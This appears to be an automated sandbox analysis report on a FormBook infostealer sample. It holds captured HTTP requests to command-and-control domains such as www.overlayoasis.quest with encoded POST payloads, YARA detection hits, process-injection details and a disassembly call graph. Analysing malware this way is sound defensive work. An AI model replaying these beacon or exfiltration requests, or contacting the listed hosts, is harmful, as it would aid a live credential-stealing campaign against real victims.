                                                                    Jan 10, 2025 09:13:45.980811119 CET528OUTGET /oqj2/?Mn=PdO8wZnxGnZX&-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6ndicPlBASrfeljqr7NFo/3ruzmmh7usSa3Ts+9UehuGvsJDxVXRAIIPhWP6NCAav+HV8QwX1dk0t+FHMIvusdCtCdZ0= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.100millionjobs.africa
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:13:46.615577936 CET819INHTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:13:46 GMT
                                                                    Server: Apache
                                                                    Location: http://maximumgroup.co.za/oqj2/?Mn=PdO8wZnxGnZX&-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6ndicPlBASrfeljqr7NFo/3ruzmmh7usSa3Ts+9UehuGvsJDxVXRAIIPhWP6NCAav+HV8QwX1dk0t+FHMIvusdCtCdZ0=
                                                                    Content-Length: 455
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6f 71 6a 32 2f 3f 4d 6e 3d 50 64 4f 38 77 5a 6e 78 47 6e 5a 58 26 61 6d 70 3b 2d 30 2d 4c 39 78 59 3d 74 67 58 59 64 6b 4c 49 51 70 35 58 31 44 51 4b 32 4c 63 30 7a 54 53 38 66 73 42 38 7a 2f 69 42 6e 67 47 4b 42 31 69 64 4a 75 52 36 6e 64 69 63 50 6c 42 41 53 72 66 65 6c 6a 71 72 37 4e 46 6f 2f 33 72 75 7a 6d 6d 68 37 75 73 53 61 33 54 73 2b 39 55 65 68 75 47 76 73 4a 44 78 56 58 52 41 49 49 50 68 57 50 36 4e 43 41 61 76 2b 48 56 38 51 77 58 31 64 6b 30 74 2b 46 48 4d 49 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/oqj2/?Mn=PdO8wZnxGnZX&amp;-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6ndicPlBASrfeljqr7NFo/3ruzmmh7usSa3Ts+9UehuGvsJDxVXRAIIPhWP6NCAav+HV8QwX1dk0t+FHMIvusdCtCdZ0=">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.650023172.67.148.216806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:59.928872108 CET793OUTPOST /ufm5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.overlayoasis.quest
                                                                    Origin: http://www.overlayoasis.quest
                                                                    Referer: http://www.overlayoasis.quest/ufm5/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 6c 65 65 30 6a 65 76 4c 72 52 30 42 62 6c 76 38 48 62 61 50 78 44 79 75 66 76 44 36 51 41 2f 69 75 7a 66 78 50 4b 75 63 75 54 6f 33 50 35 6f 4f 2f 6b 4d 35 78 63 52 6c 74 6b 45 72 51 2b 58 59 30 59 34 37 77 46 73 37 53 72 45 78 77 57 33 76 57 70 34 54 42 2f 35 69 44 62 72 79 67 30 6d 4f 44 34 63 43 71 65 4a 65 4f 2b 54 45 39 6e 66 53 72 44 74 78 6d 58 4d 51 6d 51 65 61 77 69 50 43 65 41 4b 51 51 49 74 2f 79 36 53 46 75 64 32 51 4f 6a 74 6d 67 49 54 53 2f 66 77 4d 31 65 2f 34 2b 6d 54 67 6b 6c 33 75 4c 49 4a 6a 6b 30 2b 2f 6f 49 4b 42 36 31 6e 5a 39 54 62 48 45 68 68 4b 33 4a 33 6d 61 35 70 55 59 67 6e 72
                                                                    Data Ascii: -0-L9xY=lee0jevLrR0Bblv8HbaPxDyufvD6QA/iuzfxPKucuTo3P5oO/kM5xcRltkErQ+XY0Y47wFs7SrExwW3vWp4TB/5iDbryg0mOD4cCqeJeO+TE9nfSrDtxmXMQmQeawiPCeAKQQIt/y6SFud2QOjtmgITS/fwM1e/4+mTgkl3uLIJjk0+/oIKB61nZ9TbHEhhK3J3ma5pUYgnr


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.650024172.67.148.216806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:14:02.470993042 CET817OUTPOST /ufm5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.overlayoasis.quest
                                                                    Origin: http://www.overlayoasis.quest
                                                                    Referer: http://www.overlayoasis.quest/ufm5/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 6c 65 65 30 6a 65 76 4c 72 52 30 42 64 47 33 38 42 38 47 50 35 44 79 70 51 50 44 36 5a 67 2b 4b 75 7a 54 78 50 4c 71 32 79 32 34 33 4f 64 34 4f 2b 68 77 35 69 73 52 6c 6a 45 46 41 65 65 58 54 30 59 39 47 77 41 73 37 53 72 41 78 77 54 7a 76 57 36 51 55 41 76 35 33 50 37 72 77 2b 45 6d 4f 44 34 63 43 71 65 4e 67 4f 2b 37 45 2b 58 76 53 72 6d 4e 79 71 33 4d 54 76 77 65 61 36 79 50 47 65 41 4b 75 51 4a 78 47 79 2f 57 46 75 63 47 51 4f 33 78 6c 71 49 54 55 68 76 78 4e 39 62 53 4e 33 33 53 6c 36 7a 2f 57 65 36 64 66 6c 43 6a 6c 30 37 4b 69 6f 6c 48 62 39 52 44 31 45 42 68 67 31 4a 50 6d 49 75 6c 7a 58 55 43 49 61 62 52 48 33 30 7a 61 4d 79 42 30 63 63 46 7a 35 6d 78 4a 30 67 3d 3d
                                                                    Data Ascii: -0-L9xY=lee0jevLrR0BdG38B8GP5DypQPD6Zg+KuzTxPLq2y243Od4O+hw5isRljEFAeeXT0Y9GwAs7SrAxwTzvW6QUAv53P7rw+EmOD4cCqeNgO+7E+XvSrmNyq3MTvwea6yPGeAKuQJxGy/WFucGQO3xlqITUhvxN9bSN33Sl6z/We6dflCjl07KiolHb9RD1EBhg1JPmIulzXUCIabRH30zaMyB0ccFz5mxJ0g==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.650025172.67.148.216806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:14:05.078572989 CET1830OUTPOST /ufm5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.overlayoasis.quest
                                                                    Origin: http://www.overlayoasis.quest
                                                                    Referer: http://www.overlayoasis.quest/ufm5/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 6c 65 65 30 6a 65 76 4c 72 52 30 42 64 47 33 38 42 38 47 50 35 44 79 70 51 50 44 36 5a 67 2b 4b 75 7a 54 78 50 4c 71 32 79 32 77 33 4f 71 51 4f 2f 47 6b 35 7a 63 52 6c 72 6b 45 6e 65 65 58 43 30 65 56 4b 77 41 51 42 53 70 49 78 77 31 50 76 44 37 51 55 4a 76 35 33 48 62 72 7a 67 30 6d 68 44 38 42 4c 71 65 39 67 4f 2b 37 45 2b 56 33 53 69 54 74 79 73 33 4d 51 6d 51 65 65 77 69 50 75 65 45 75 68 51 4a 31 4a 79 4c 69 46 75 38 57 51 4d 45 5a 6c 77 49 54 57 67 76 77 65 39 62 57 6b 33 33 4f 44 36 7a 6a 38 65 36 35 66 6b 30 32 6b 75 35 4f 41 31 55 48 42 73 77 4c 51 43 47 5a 69 2f 4b 66 64 50 65 39 52 49 46 6e 6c 58 63 49 64 34 56 43 69 4f 68 56 67 56 72 6f 36 30 46 6b 57 32 62 65 41 63 59 6e 4b 61 35 4c 2b 7a 67 44 71 4a 67 50 79 59 4f 7a 62 31 48 75 6e 78 51 78 5a 4e 71 59 75 52 75 49 43 6d 33 63 62 77 62 4b 35 4f 52 6e 49 41 45 6e 2b 6c 34 30 74 2b 46 37 53 59 6e 31 4b 4c 4a 44 54 49 72 7a 42 6f 41 68 42 7a 55 38 55 55 54 4a 6d 75 67 76 4f 48 46 59 4d 66 38 41 67 6a 58 4e 37 6f 36 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=lee0jevLrR0BdG38B8GP5DypQPD6Zg+KuzTxPLq2y2w3OqQO/Gk5zcRlrkEneeXC0eVKwAQBSpIxw1PvD7QUJv53Hbrzg0mhD8BLqe9gO+7E+V3SiTtys3MQmQeewiPueEuhQJ1JyLiFu8WQMEZlwITWgvwe9bWk33OD6zj8e65fk02ku5OA1UHBswLQCGZi/KfdPe9RIFnlXcId4VCiOhVgVro60FkW2beAcYnKa5L+zgDqJgPyYOzb1HunxQxZNqYuRuICm3cbwbK5ORnIAEn+l40t+F7SYn1KLJDTIrzBoAhBzU8UUTJmugvOHFYMf8AgjXN7o6KBanUdRovW3pVV+q7NkNZdh/cr241BoMNvcmuHzF0o/rrQapY8BzmzuXQyD2RmwpflNrPHOpjy+RfNQTqUY/kUqin5dDhwDRFeMVf1QZvPG6VhHml0IkFqE5y+0hk4eSYKJnrD5rZxsrbWIufBqPY28XWzvTkbPjYcD6ORyzqpQgMJjMksBsa+qST+iECdIsps2RYHaXbj0pFTEEzPy8hk/W9COigjG0VoLYRNSQcVekBHXISdjC7/fXhRnSWcU7z40XHfzDa4WXBOIHvWaXpCpirjQDGHu4s17+HOH1jKiD7aHd5da7glMGVuhzzsvfBoDjKezIygzwNk0UpdFx2LSWl/5nKwiiybV4582j8OvOv/PXZyuP3MQKyQKh8Q8uQy60tiED+kj+E7A9mxvS8x1pb22W69bRRCSMQecYJ97Dt9p96Y1LbNyvvI/OPUd4sNGuuRliXgWdtBBTYi+pr7wuw3N9HvNDNZeBBEOijQWteRqWKJAlfVtb4W70EUABq112GmoDNwMlWw43idMhtqLS9/XEwSypmEia63mDMVxlLaBEs/VjC/SUPcBb8dIX8EyzY0qaC0J+z3M84Hyas2Ewl55dvjC7IHvWyKPkxwyNb7MDm2Jy0juKHPd9hf8sSWcvcckLWra2gvuOML02/eVE8dxtZCULx/ [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    40192.168.2.650026172.67.148.21680
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:14:08.711512089 CET525OUTGET /ufm5/?Mn=PdO8wZnxGnZX&-0-L9xY=oc2Ugo7X/DVLb3HoIsa141WPD8DQYVLt5ibtMrinrDozD5x17UU4sfIyzVFZWMP4gpVNgjcaO4w3lUPdIZ87CNE5Lom3+E6tX7ctr5EfQpvE80XMoDlosFwsnFO5slPeaFGzRec= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.overlayoasis.quest
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:03:09:59
                                                                    Start date:10/01/2025
                                                                    Path:C:\Users\user\Desktop\1162-201.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\1162-201.exe"
                                                                    Imagebase:0xc20000
                                                                    File size:1'618'432 bytes
                                                                    MD5 hash:334085B11D8F0DCAD01BB1C6414ACC91
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:03:09:59
                                                                    Start date:10/01/2025
                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\1162-201.exe"
                                                                    Imagebase:0xbc0000
                                                                    File size:46'504 bytes
                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2579849248.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2581550429.0000000005DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:03:10:34
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe"
                                                                    Imagebase:0x100000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4623485395.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:6
                                                                    Start time:03:10:35
                                                                    Start date:10/01/2025
                                                                    Path:C:\Windows\SysWOW64\chkntfs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                                                                    Imagebase:0x430000
                                                                    File size:19'968 bytes
                                                                    MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4623571389.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4623321437.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:7
                                                                    Start time:03:10:48
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe"
                                                                    Imagebase:0x100000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4625453218.0000000005240000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:9
                                                                    Start time:03:11:01
                                                                    Start date:10/01/2025
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff728280000
                                                                    File size:676'768 bytes
                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:4.7%
                                                                      Dynamic/Decrypted Code Coverage:1.7%
                                                                      Signature Coverage:2.7%
                                                                      Total number of Nodes:1030
                                                                      Total number of Limit Nodes:32
                                                                      execution_graph 46824 c22de3 46825 c22df0 __wsopen_s 46824->46825 46826 c22e09 46825->46826 46827 c62c2b ___scrt_fastfail 46825->46827 46840 c23aa2 46826->46840 46829 c62c47 GetOpenFileNameW 46827->46829 46831 c62c96 46829->46831 46898 c26b57 46831->46898 46835 c62cab 46835->46835 46837 c22e27 46868 c244a8 46837->46868 46910 c61f50 46840->46910 46843 c23ae9 46916 c2a6c3 46843->46916 46844 c23ace 46845 c26b57 22 API calls 46844->46845 46847 c23ada 46845->46847 46912 c237a0 46847->46912 46850 c22da5 46851 c61f50 __wsopen_s 46850->46851 46852 c22db2 GetLongPathNameW 46851->46852 46853 c26b57 22 API calls 46852->46853 46854 c22dda 46853->46854 46855 c23598 46854->46855 46967 c2a961 46855->46967 46858 c23aa2 23 API calls 46859 c235b5 46858->46859 46860 c235c0 46859->46860 46861 c632eb 46859->46861 46972 c2515f 46860->46972 46865 c6330d 46861->46865 46984 c3ce60 41 API calls 46861->46984 46867 c235df 46867->46837 46985 c24ecb 46868->46985 46871 c63833 47007 c92cf9 46871->47007 46872 c24ecb 94 API calls 46875 c244e1 46872->46875 46874 c63848 46876 c6384c 46874->46876 46877 c63869 46874->46877 46875->46871 46878 c244e9 46875->46878 47057 c24f39 46876->47057 46880 c3fe0b 22 API calls 46877->46880 46881 c63854 46878->46881 46882 c244f5 46878->46882 46890 c638ae 46880->46890 47063 c8da5a 82 API calls 46881->47063 47056 c2940c 136 API calls 2 library calls 46882->47056 46885 c63862 46885->46877 46886 c22e31 46887 c63a5f 46893 c63a67 46887->46893 46888 c24f39 68 API calls 46888->46893 46890->46887 46890->46893 46895 c29cb3 22 API calls 46890->46895 47033 c8967e 46890->47033 47036 c90b5a 46890->47036 47042 c2a4a1 46890->47042 47050 c23ff7 46890->47050 47064 c895ad 42 API calls _wcslen 46890->47064 46893->46888 47065 c8989b 82 API calls __wsopen_s 46893->47065 46895->46890 46899 c26b67 _wcslen 46898->46899 46900 c64ba1 46898->46900 46903 c26ba2 46899->46903 46904 c26b7d 46899->46904 46901 c293b2 22 API calls 46900->46901 46902 c64baa 46901->46902 46902->46902 46906 c3fddb 22 API calls 46903->46906 47411 c26f34 22 API calls 46904->47411 46908 c26bae 46906->46908 46907 c26b85 __fread_nolock 46907->46835 46909 c3fe0b 22 API calls 46908->46909 46909->46907 46911 c23aaf GetFullPathNameW 46910->46911 46911->46843 46911->46844 46913 c237ae 46912->46913 46922 c293b2 46913->46922 46915 c22e12 46915->46850 46917 c2a6d0 46916->46917 46918 c2a6dd 46916->46918 46917->46847 46919 c3fddb 22 API calls 46918->46919 46920 c2a6e7 46919->46920 46921 c3fe0b 22 API calls 46920->46921 46921->46917 46923 c293c0 46922->46923 46924 c293c9 __fread_nolock 46922->46924 46923->46924 46926 c2aec9 46923->46926 46924->46915 46924->46924 46927 c2aedc 46926->46927 46931 c2aed9 __fread_nolock 46926->46931 46932 c3fddb 46927->46932 46929 c2aee7 46942 c3fe0b 46929->46942 46931->46924 46934 c3fde0 46932->46934 46935 c3fdfa 46934->46935 46938 c3fdfc 46934->46938 46952 c4ea0c 46934->46952 46959 c44ead 7 API calls 2 library calls 46934->46959 46935->46929 46937 c4066d 46961 c432a4 RaiseException 46937->46961 46938->46937 46960 c432a4 RaiseException 46938->46960 46941 c4068a 46941->46929 46944 c3fddb 46942->46944 46943 c4ea0c ___std_exception_copy 21 API calls 46943->46944 46944->46943 46945 c3fdfa 46944->46945 46947 c3fdfc 46944->46947 46964 c44ead 7 API calls 2 library calls 46944->46964 46945->46931 46948 c4066d 46947->46948 46965 c432a4 RaiseException 46947->46965 46966 c432a4 RaiseException 46948->46966 46951 c4068a 46951->46931 46957 c53820 __dosmaperr 46952->46957 46953 c5385e 46963 c4f2d9 20 API calls __dosmaperr 46953->46963 46955 c53849 RtlAllocateHeap 46956 c5385c 46955->46956 46955->46957 46956->46934 46957->46953 46957->46955 46962 c44ead 7 API calls 2 library calls 46957->46962 46959->46934 46960->46937 46961->46941 46962->46957 46963->46956 46964->46944 46965->46948 46966->46951 46968 c3fe0b 22 API calls 46967->46968 46969 c2a976 46968->46969 46970 c3fddb 22 API calls 46969->46970 46971 c235aa 46970->46971 46971->46858 46973 c2516e 46972->46973 46977 c2518f __fread_nolock 46972->46977 46975 c3fe0b 22 API calls 46973->46975 46974 c3fddb 22 API calls 46976 c235cc 46974->46976 46975->46977 46978 c235f3 46976->46978 46977->46974 46979 c23605 46978->46979 46983 c23624 __fread_nolock 46978->46983 46982 c3fe0b 22 API calls 46979->46982 46980 c3fddb 22 API calls 46981 c2363b 46980->46981 46981->46867 46982->46983 46983->46980 46984->46861 47066 c24e90 LoadLibraryA 46985->47066 46990 c24ef6 LoadLibraryExW 47074 c24e59 LoadLibraryA 46990->47074 46991 c63ccf 46992 c24f39 68 API calls 46991->46992 46994 c63cd6 46992->46994 46996 c24e59 3 API calls 46994->46996 46998 c63cde 46996->46998 47096 c250f5 46998->47096 46999 c24f20 46999->46998 47000 c24f2c 46999->47000 47001 c24f39 68 API calls 47000->47001 47003 c244cd 47001->47003 47003->46871 47003->46872 47006 c63d05 47008 c92d15 47007->47008 47009 c2511f 64 API calls 47008->47009 47010 c92d29 47009->47010 47239 c92e66 47010->47239 47013 c250f5 40 API calls 47014 c92d56 47013->47014 47015 c250f5 40 API calls 47014->47015 47016 c92d66 47015->47016 47017 c250f5 40 API calls 47016->47017 47018 c92d81 47017->47018 47019 c250f5 40 API calls 47018->47019 47020 c92d9c 47019->47020 47021 c2511f 64 API calls 47020->47021 47022 c92db3 47021->47022 47023 c4ea0c ___std_exception_copy 21 API calls 47022->47023 47024 c92dba 47023->47024 47025 c4ea0c ___std_exception_copy 21 API calls 47024->47025 47026 c92dc4 47025->47026 47027 c250f5 40 API calls 47026->47027 47028 c92dd8 47027->47028 47029 c928fe 27 API calls 47028->47029 47030 c92dee 47029->47030 47031 c92d3f 47030->47031 47245 c922ce 47030->47245 47031->46874 47034 c3fe0b 22 API calls 47033->47034 47035 c896ae __fread_nolock 47034->47035 47035->46890 47037 c90b65 47036->47037 47038 c3fddb 22 API calls 47037->47038 47039 c90b7c 47038->47039 47405 c29cb3 47039->47405 47043 c2a52b 47042->47043 47048 c2a4b1 __fread_nolock 47042->47048 47045 c3fe0b 22 API calls 47043->47045 47044 c3fddb 22 API calls 47046 c2a4b8 47044->47046 47045->47048 47047 c3fddb 22 API calls 47046->47047 47049 c2a4d6 47046->47049 47047->47049 47048->47044 47049->46890 47051 c2400a 47050->47051 47053 c240ae 47050->47053 47052 c3fe0b 22 API calls 47051->47052 47055 c2403c 47051->47055 47052->47055 47053->46890 47054 c3fddb 22 API calls 47054->47055 47055->47053 47055->47054 47056->46886 47058 c24f43 47057->47058 47060 c24f4a 47057->47060 47059 c4e678 67 API calls 47058->47059 47059->47060 47061 c24f6a FreeLibrary 47060->47061 47062 c24f59 47060->47062 47061->47062 47062->46881 47063->46885 47064->46890 47065->46893 47067 c24ec6 47066->47067 47068 c24ea8 GetProcAddress 47066->47068 47071 c4e5eb 47067->47071 47069 c24eb8 47068->47069 47069->47067 47070 c24ebf FreeLibrary 47069->47070 47070->47067 47104 c4e52a 47071->47104 47073 c24eea 47073->46990 47073->46991 47075 c24e6e GetProcAddress 47074->47075 47076 c24e8d 47074->47076 47077 c24e7e 47075->47077 47079 c24f80 47076->47079 47077->47076 47078 c24e86 FreeLibrary 47077->47078 47078->47076 47080 c3fe0b 22 API calls 47079->47080 47081 c24f95 47080->47081 47165 c25722 47081->47165 47083 c24fa1 __fread_nolock 47084 c250a5 47083->47084 47085 c63d1d 47083->47085 47095 c24fdc 47083->47095 47168 c242a2 CreateStreamOnHGlobal 47084->47168 47179 c9304d 74 API calls 47085->47179 47088 c63d22 47090 c2511f 64 API calls 47088->47090 47089 c250f5 40 API calls 47089->47095 47091 c63d45 47090->47091 47092 c250f5 40 API calls 47091->47092 47094 c2506e messages 47092->47094 47094->46999 47095->47088 47095->47089 47095->47094 47174 c2511f 47095->47174 47097 c25107 47096->47097 47099 c63d70 47096->47099 47201 c4e8c4 47097->47201 47101 c928fe 47222 c9274e 47101->47222 47103 c92919 47103->47006 47106 c4e536 CallCatchBlock 47104->47106 47105 c4e544 47129 c4f2d9 20 API calls __dosmaperr 47105->47129 47106->47105 47109 c4e574 47106->47109 47108 c4e549 47130 c527ec 26 API calls __wsopen_s 47108->47130 47111 c4e586 47109->47111 47112 c4e579 47109->47112 47121 c58061 47111->47121 47131 c4f2d9 20 API calls __dosmaperr 47112->47131 47115 c4e58f 47116 c4e595 47115->47116 47117 c4e5a2 47115->47117 47132 c4f2d9 20 API calls __dosmaperr 47116->47132 47133 c4e5d4 LeaveCriticalSection __fread_nolock 47117->47133 47118 c4e554 __wsopen_s 47118->47073 47122 c5806d CallCatchBlock 47121->47122 47134 c52f5e EnterCriticalSection 47122->47134 47124 c5807b 47135 c580fb 47124->47135 47128 c580ac __wsopen_s 47128->47115 47129->47108 47130->47118 47131->47118 47132->47118 47133->47118 47134->47124 47137 c5811e 47135->47137 47136 c58177 47154 c54c7d 20 API calls __dosmaperr 47136->47154 47137->47136 47144 c58088 47137->47144 47152 c4918d EnterCriticalSection 47137->47152 47153 c491a1 LeaveCriticalSection 47137->47153 47140 c58180 47155 c529c8 47140->47155 47142 c58189 47142->47144 47161 c53405 